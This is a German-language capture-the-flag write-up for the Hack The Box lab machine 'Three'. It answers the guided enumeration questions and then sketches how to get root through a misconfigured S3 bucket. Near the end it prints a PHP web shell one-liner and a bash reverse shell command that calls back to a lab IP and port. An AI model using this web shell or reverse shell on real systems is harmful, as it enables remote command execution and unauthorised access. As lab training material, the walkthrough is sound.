Three | HTB Starting Point Writeup T1M05
In diesem Writeup geht es um die Starting Point Maschine "Three" auf Hack The Box.
Wie immer, dass passende Video zum Beitrag hier: https://youtu.be/NBHD1N8v-BM
- Wie viele TCP-Ports sind offen?
2
- Wie lautet die Domäne der E-Mail-Adresse, die in der Rubrik "Kontakt" auf der Website angegeben ist?
thetoppers.htb
- Welche Linux-Datei können wir in Ermangelung eines DNS-Servers verwenden, um Hostnamen in IP-Adressen aufzulösen, damit wir auf die Websites zugreifen können, die auf diese Hostnamen verweisen?
/etc/hosts
- Welche Sub-Domain wird bei der weiteren Enumeration entdeckt?
s3.thetoppsers.htb
- Welcher Dienst läuft auf der entdeckten Sub-Domäne?
Amazon S3
- Welches Befehlszeilendienstprogramm kann verwendet werden, um mit dem Dienst zu interagieren, der auf der ermittelten Subdomäne läuft?
awscli
- Welcher Befehl wird zum Einrichten der AWS CLI-Installation verwendet?
aws configure
- Welchen Befehl verwendet das obige Dienstprogramm, um alle S3-Buckets aufzulisten?
aws s3 ls
- Dieser Server ist so konfiguriert, dass er Dateien ausführt, die in welcher Web-Skriptsprache geschrieben wurden?
php
Root Flag
- PHP Shell Einzeiler erstellen und in ein File speichern
echo '<?php system($_GET["cmd"]); ?>' > shell.php
- in den S3 Bucket laden
- Sicherstellen, dass die Shell funktioniert
- erstellen einer bash Datei zum ausführen der reverse Shell
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.124/8888 0>&1
- listener auf den entsprechenden Port einschalten
- Python Webserver für die shell.sh bereitstellen
- über die PHP Shell den reverse Shell code downloaden und in der bash ausführen
- Nun fehlt nur noch die Flag